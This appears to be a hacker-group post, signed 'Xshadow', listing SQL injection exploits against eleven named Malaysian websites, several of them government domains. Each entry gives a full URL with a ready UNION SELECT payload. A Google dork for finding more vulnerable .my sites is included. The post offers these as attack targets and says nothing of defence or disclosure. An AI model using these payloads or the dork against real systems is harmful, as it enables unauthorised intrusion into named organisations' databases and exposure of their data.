SQL Injection @ Malingsial CMS paranoid dork
SQL Injection Vulnerability & multiple SQL Injection Vulnerability Malingsial CMS with Paranoid Dork
[+] Bug : SQL injection
[+] Vendor : Random Paranoid
[+] Author : Xshadow
[+] Contact : admin[a]cukdus[dot]org
[+] Visit : http://xshadow-power[dot]com
[+] Greetz : inc0mp13te, IndoUnderground, Jack-, selalu_ngantuk, cyber_tomat, black_sonic, k0il, all member x-code
[+] Main Support: Indonesia
[+] Support Person: yadoy666 (http://yadoy666.serverisdown.org/)
[+] Sponsors: http://malingsial.serverisdown.org/
Paranoid Dork: inurl:”.php?id=” site:.my
[o]Sql Injection part 1
[=]original vendor: unknown malingsial CMS
[=]vuln file : corporate.php
[=]target : http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+UNION+SELECT+0,version(),2,3,4,5,6,7,8
[o]Sql Injection part 2
[=]original vendor: Multimedia Development Corporation
[=]vuln file : event_detail.php
[=]target :http://cmc.msc.com.my/event_detail.php?ID=239+AND+1=2+UNION+SELECT+0,1,version(),version(),
version(),5,6,7,8,9,10,11,12,13,14–
[o]Sql Injection part 3
[=]original vendor: unknown malingsial CMS
[=]vuln file : readnews.php
[=]target :http://www.mynic.net.my/readnews.php?id=78+AND+1=2+UNION+SELECT+0,version(),2,3,version(),5,6,7,8,
9,10,11,12–
[o]Sql Injection part 4
[=]original vendor: unknown malingsial CMS
[=]vuln file : tips.php
[=]target : http://www.fomca.org.my/english/tips.php?id=21+AND+1=2+UNION+SELECT+0,version(),version(),3,4,5,6,7,8–
[o]Sql Injection part 5
[=]original vendor: unknown malingsial CMS
[=]vuln file : full_metadata_xml.php
[=]target: http://www.infodesa.gov.my/infodesa/applications/datasource/full_metadata_xml.php?id=191+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,version(),
10,version(),version(),version(),version(),version(),version(),version(),18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,
50,51–
[o]Sql Injection part 6
[=]original vendor: unknown malingsial CMS
[=]vuln file : about_pressRelease_det.php
[=] target : http://www.nazakia.com.my/about_pressRelease_det.php?id=43+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,
version(),version(),13,14,15,16,17,18,19–
[o]Sql Injection part 7
[=]original vendor: unknown malingsial CMS
[=]vuln file : aduan_siar_c.php
[=] target : http://www.halaljakim.gov.my/aduan_siar_c.php?id=1931+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,version(),9,
10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28–
[o]Sql Injection part 8
[=]original vendor: unknown malingsial CMS
[=]vuln file : faq.php
[=] target : http://www.mynic.net.my/faq.php?id=29+AND+1=2+UNION+SELECT+0,version(),2,3–
[o]Sql Injection part 9
[=]original vendor: unknown malingsial CMS
[=]vuln file : item.php
[=] target : http://www.reliancemetal.com.my/catalog/item.php?id=124+AND+1=2+UNION+SELECT+0,1,2,3,4,5,version(),7,8,9,
10,11,12,13,14–
[o]Sql Injection part 10
[=]original vendor: unknown malingsial CMS
[=]vuln file : pressroom_pressrelease_release.php
[=] target : http://www.misc.com.my/pressroom_pressrelease_release.php?id=35+AND+1=2+UNION+SELECT+0,1,
version(),version(),version(),5,6,7,version(),9,10–
[o]Sql Injection part 11
[=]original vendor: unknown malingsial CMS
[=]vuln file : item.php
[=] target : http://www.automotivefilter.com.my/catalog/item.php?id=1610+AND+1=2+UNION+SELECT+0,1,2,3,4,5,version(),7,8,
9,10,11,12,13,14–
